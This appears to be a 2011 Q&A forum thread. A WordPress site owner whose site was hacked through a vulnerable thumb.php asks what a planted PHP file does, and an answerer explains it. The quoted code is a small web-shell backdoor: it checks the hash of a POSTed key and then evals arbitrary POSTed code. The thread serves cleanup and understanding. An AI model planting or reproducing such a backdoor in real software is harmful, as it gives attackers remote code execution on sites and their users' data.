Decrypt Malicious inserterted PHP

Posted on 2011-09-27
Last Modified: 2012-05-12
I had a client's WordPress website hacked last week because of a leaky thumb.php. Cleaned up the website and replaced the leaky thumb.php. A PHP file was added to the theme's cached:
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){
$cmd = $_POST["code"];
eval (stripslashes($cmd));

Open in new window

I need someone to explain this code to me, Did find: but no precise explanation was given

PS The malicious code consequently added to a WP core file I have not added here
Question by:rhandalthor
LVL 70

Accepted Solution

Jason C. Levine earned 500 total points
ID: 36714634
If a specially crafted post is sent to the site with a variable of "key" defined, line 1 evaluates and turns into a command that lines 2 and 3 execute.  

I assume it does something less than optimal :)

Author Comment

ID: 36714679
Yeah. Hadn't worked with $_POST for a while and certainly not this way. Well, think all is cleaned up and fortified again.. Thanks Jason.

Featured Post

Courses: Start Training Online With Pros, Today

Brush up on the basics or master the advanced techniques required to earn essential industry certifications, with Courses. Enroll in a course and start learning today. Training topics range from Android App Dev to the Xen Virtualization Platform.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Learn by example how to specify CSS selectors for Selenium WebDriver test automation software.
Nothing in an HTTP request can be trusted, including HTTP headers and form data.  A form token is a tool that can be used to guard against request forgeries (CSRF).  This article shows an improved approach to form tokens, making it more difficult to…
The viewer will learn how to create a basic form using some HTML5 and PHP for later processing. Set up your basic HTML file. Open your form tag and set the method and action attributes.: (CODE) Set up your first few inputs one for the name and …
Learn how to create flexible layouts using relative units in CSS.  New relative units added in CSS3 include vw(viewports width), vh(viewports height), vmin(minimum of viewports height and width), and vmax (maximum of viewports height and width).

808 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question